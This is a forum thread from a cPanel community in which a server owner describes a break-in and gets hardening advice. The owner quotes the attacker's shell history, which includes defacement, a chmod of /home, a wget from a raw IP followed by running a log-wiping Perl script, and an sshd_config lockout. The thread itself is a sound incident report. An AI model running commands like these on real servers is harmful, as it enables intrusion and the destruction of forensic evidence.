The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Hacking attempt with a problem help

Discussion in 'General Discussion' started by bsasninja, May 18, 2011.

  1. bsasninja

    bsasninja Well-Known Member

    Joined:
    Sep 2, 2004
    Messages:
    528
    Likes Received:
    0
    Trophy Points:
    16
    Hi today I received a hacking attempt, somehow I dont know yet they get into one of my servers, they modified my sshd_config and they blockme away from accessing to the server anymore. So a technician of the DC went to my machine, restored the sshd_config file and I was allowed to log again.

    Looking at my root .bash_history i found:
    pico /usr/local/apache/conf/includes/errordocument.conf (they modified a 403 page to some hacked site)
    service httpd restart
    ls -l /
    chmod 000 /home
    w
    w
    w
    chmod 711 /home
    cd /tmp
    perl log
    wget 41.140.123.34/log
    perl log
    top
    mcedit /etc/ssh/sshd_config
    service sshd restart
    exit


    ok this is what the attacker did, the file log that he downloaded is a file that remove all traces, but he forgot this one.
    I have blocked all africa traffic as a first step, now the log script removed the following files:

    /var/log/lastlog
    /var/log/messages
    /var/log/warn
    /var/log/wtmp
    /var/log/secure
    /var/log/auth
    /var/log/auth.log

    I had to restore wtmp file. Now the problem is the following if I log to the server shows me no users on it, when I run TOP show 0 users and Im online in the server, also if I put who or w shows nothing.
    How do I fix this???

    Thank you!
     
  2. bsasninja

    bsasninja Well-Known Member

    Joined:
    Sep 2, 2004
    Messages:
    528
    Likes Received:
    0
    Trophy Points:
    16
    I found the solution also the file at /var/run/utmp was removed. I created it again and now is working :)
     
  3. k-planethost

    k-planethost Well-Known Member

    Joined:
    Sep 22, 2009
    Messages:
    199
    Likes Received:
    4
    Trophy Points:
    18
    Location:
    Athens Greece
    i suggest to harden your ssh disable telnet make sure it is up to date and move ssh to a different port that 22
     
  4. bsasninja

    bsasninja Well-Known Member

    Joined:
    Sep 2, 2004
    Messages:
    528
    Likes Received:
    0
    Trophy Points:
    16
    port was already in other port ssh was hardened also, telnet disabled. Today I will dig into the server to see how the could break in.

    Also Im running antispyware-antivirus-trojan tools on my computer to see if there is some sniffing app.
     
  5. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,623
    Likes Received:
    21
    Trophy Points:
    38
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    Do you provide your root password to anyone else? If so, you would want to ensure that user also runs a check on their local system.

    I would likewise suggest not allowing direct root login, but a wheel group user who has only sudo su - access, then disallowing direct root login if you haven't done so.

    Next, I would restrict SSH to only your IP address(es). You can do that in WHM > Host Access Control area by setting allow only for your IP for sshd and then disallowing all other IPs. Good luck to an attacker to get into the machine without direct control over your local system at that point.
     
  6. bsasninja

    bsasninja Well-Known Member

    Joined:
    Sep 2, 2004
    Messages:
    528
    Likes Received:
    0
    Trophy Points:
    16
    I have direct root logins disabled and /tmp dev/shm protected
    I have also closed all user open folders with 777 permisions. I disabled some apache_* php functions.
    All server soft is updated to the latetest versions. Except for php that is still in 5.2.17 cause if I turn to 5.3 lot of server scritps will stop working. Anyways I have a plan to upgrade this year before I give some time to my customers to do the necesary changes to their scritps.
     
  7. cass

    cass Well-Known Member

    Joined:
    Jul 17, 2002
    Messages:
    354
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Argentina/USA/Mexico
    Do you found what was the problem/hole ?
    We had this same issue on a client server today, but still looking to see what is the hole, the server had suphp, and other hardening, but still hacked the same way, changing 403 to a page, and chmod 000 to /home, same team for sure.
     
Loading...

Share This Page